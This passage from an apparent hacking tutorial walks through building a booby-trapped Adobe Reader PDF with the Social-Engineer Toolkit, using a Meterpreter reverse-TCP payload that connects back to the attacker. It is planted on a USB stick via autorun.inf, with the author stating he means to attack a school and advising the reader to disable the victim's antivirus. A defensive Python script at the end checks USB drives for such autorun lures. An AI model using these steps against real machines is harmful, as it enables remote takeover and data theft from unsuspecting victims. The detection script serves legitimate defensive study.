#Step 5 -

Now a list of software to exploit comes up; this is the real deal. Select the software you know is running on the victim machine(s). Adobe Reader and Microsoft Word are the most common in schools, so I will select option 11, the Adobe Reader PDF exploit in this version of SET (the numbering changes between SET releases, so read the menu rather than copying the number).

#Step 6 -

Now you have two options: a blank, SET-generated PDF or your own PDF file. We'll use our own file. Enter the path to the PDF as /home/exam-sheet.pdf and the output file name as exam-sheet.pdf
(evil laugh, because I'm going to attack the school). You can set another file name.

#Step 7 -

Now select option 2 for windows/meterpreter/reverse_tcp.

#Step 8 -

Now you need to enter the IP address for the listener, i.e. the attacker machine that the payload connects back to. Enter your public IP address (or your LAN IP if the target is on the same network) and port 80, then press Enter. With a public IP you also have to forward that port from your router to the attacker machine, or the reverse connection never arrives.

#Step 9 -

Here we need to edit the autorun.inf file. Go to the directory where both files, the payload and the autorun file, are located, and edit and rename them as follows:
#open a new terminal and type:
            ls -al /pentest/exploits/set/autorun/
we can see two files here: one is the autorun file and the other is the template.
#Now go to the directory:
         cd /pentest/exploits/set/autorun
#Type "nano autorun.inf" (it opens the autorun.inf file in the nano editor). Here, give the name of the file you want opened when the USB is plugged in; for me, I insert the name exam-sheet.pdf.
#Copy both files to the USB drive.

#Step 10 -

Keep the attacker computer running with the listener up, and when you plug the USB drive into the victim PC you will get a Meterpreter session on your (attacker) computer. From there you can copy files, run a remote shutdown and much more.
Two caveats. The exploit only fires if the victim's Adobe Reader is the vulnerable version the chosen SET module targets, and AutoRun from USB sticks has been disabled on XP, Vista and 7 since the 2011 update (KB971029), so on a patched machine the victim has to open the PDF themselves. You're done.


Side tip: disable the antivirus on the victim PC if you get the chance; it will make things easier.
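The defensive counterpart of the USB trick, as an added example (not part of the original post): when a stick of unknown origin turns up, check whether it carries an autorun.inf and what that file would launch. The script parses the [autorun] section, lists the launch keys (open=, shellexecute=, shell\verb\command=) with the file each points at, and reports the action= text, which is the string shown in the AutoPlay dialog and is routinely spoofed to read like the built-in "Open folder to view files". The drive image is constructed in a temporary directory to mirror the post (a PDF lure plus an autorun.inf); the autorun.inf contents are an assumption, not the template SET generates.

```python
"""Report what an autorun.inf on a removable drive would launch.

Parses [autorun] and lists the launch keys (open=, shellexecute=,
shell\\<verb>\\command=) and the files they point at.
"""
import os
import shutil
import tempfile

LAUNCH_KEYS = {"open", "shellexecute"}


def parse_autorun(text: str) -> list:
    """Return (section, key, value) triples; INI-style, ';' comments, keys lower-cased."""
    section, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries.append((section, key.strip().lower(), value.strip()))
    return entries


def assess_drive(drive_root: str) -> dict:
    """Describe the autorun.inf at the root of drive_root, if any."""
    path = os.path.join(drive_root, "autorun.inf")
    if not os.path.isfile(path):
        return {"present": False, "launches": [], "lure": None}
    with open(path, encoding="utf-8", errors="replace") as fh:
        entries = parse_autorun(fh.read())
    launches, lure = [], None
    for section, key, value in entries:
        if section != "autorun":
            continue
        if key == "action":
            lure = value          # text shown in the AutoPlay dialog, often spoofs "Open folder"
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            target = value.split()[0].strip('"') if value else ""
            launches.append({
                "key": key,
                "target": target,
                "ext": os.path.splitext(target)[1].lower(),
                "target_exists": os.path.isfile(os.path.join(drive_root, target)),
            })
    return {"present": True, "launches": launches, "lure": lure}


def demo() -> dict:
    """Constructed drive image modelled on the post: a PDF lure plus an autorun.inf."""
    root = tempfile.mkdtemp(prefix="usb-")
    try:
        with open(os.path.join(root, "exam-sheet.pdf"), "wb") as fh:
            fh.write(b"%PDF-1.4\n%placeholder, not an exploit\n")
        with open(os.path.join(root, "autorun.inf"), "w") as fh:
            fh.write("[autorun]\nshellexecute=exam-sheet.pdf\nicon=exam-sheet.pdf\n"
                     "action=Open folder to view files\n")
        return assess_drive(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    report = demo()
    for launch in report["launches"]:
        print(f"{launch['key']} -> {launch['target']} (exists={launch['target_exists']}) "
              f"lure={report['lure']!r}")
```

On a live system run assess_drive("E:\\") (or the mount point on Linux) before opening anything on the stick; a launch key pointing at a document, combined with an action= string that imitates Explorer's own wording, is the signature of exactly the lure built above.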
